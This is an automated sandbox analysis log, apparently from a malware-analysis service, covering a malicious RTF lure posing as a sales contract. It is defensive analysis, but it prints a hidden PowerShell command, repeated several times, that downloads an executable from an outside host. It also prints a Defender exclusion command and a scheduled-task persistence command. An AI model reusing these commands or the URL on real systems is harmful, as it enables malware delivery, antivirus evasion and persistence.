Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe

Source: C:\Users\user\AppData\Roaming\mum.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: Revised sales contract for Crosswear.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Revised sales contract for Crosswear.rtf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$vised sales contract for Crosswear.rtf

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5CAF.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winRTF@44/31@8/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\mum.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\mum.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\mum.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\mum.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Roaming\mum.exe	Mutant created: \Sessions\1\BaseNamedObjects\QgnNxTzT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: mum[1].exe.0.dr, u0006u2000.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: mum.exe.4.dr, u0006u2000.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: RRUwFfPTEDHYrl.exe.8.dr, u0006u2000.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 8.0.mum.exe.11b0000.0.unpack, u0006u2000.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.mum.exe.400000.0.unpack, ???u0089ufffd/u07b9???Z.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 15.0.mum.exe.400000.0.unpack, u0097?ufffd?t/B?ufffd??.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\mum.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\mum.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\mum.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: :\Windows\mscorlib.pdb3 source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb#\'$ source: powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb?\'$ source: powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb/ source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp

Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Suspicious powershell command line found

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')	Jump to behavior

.NET source code contains potential unpacker

Source: mum[1].exe.0.dr, u0006u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: mum.exe.4.dr, u0006u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: RRUwFfPTEDHYrl.exe.8.dr, u0006u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.mum.exe.11b0000.0.unpack, u0006u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 8_2_054C361B push ecx; retf	8_2_054C361E
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 15_2_002C12EF push eax; retn 0026h	15_2_002C12F9
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 19_2_0535361B push ecx; retf	19_2_0535361E
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 26_2_001C12EF push eax; retn 0016h	26_2_001C12F9
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 29_2_0512361B push ecx; retf	29_2_0512361E
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_002512EF push eax; retn 001Bh	34_2_002512F9

Source: initial sample	Static PE information: section name: .text entropy: 7.984077210113765
Source: initial sample	Static PE information: section name: .text entropy: 7.984077210113765
Source: initial sample	Static PE information: section name: .text entropy: 7.984077210113765

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\mum.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\mum.exe	File created: C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Roaming\mum.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmp

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
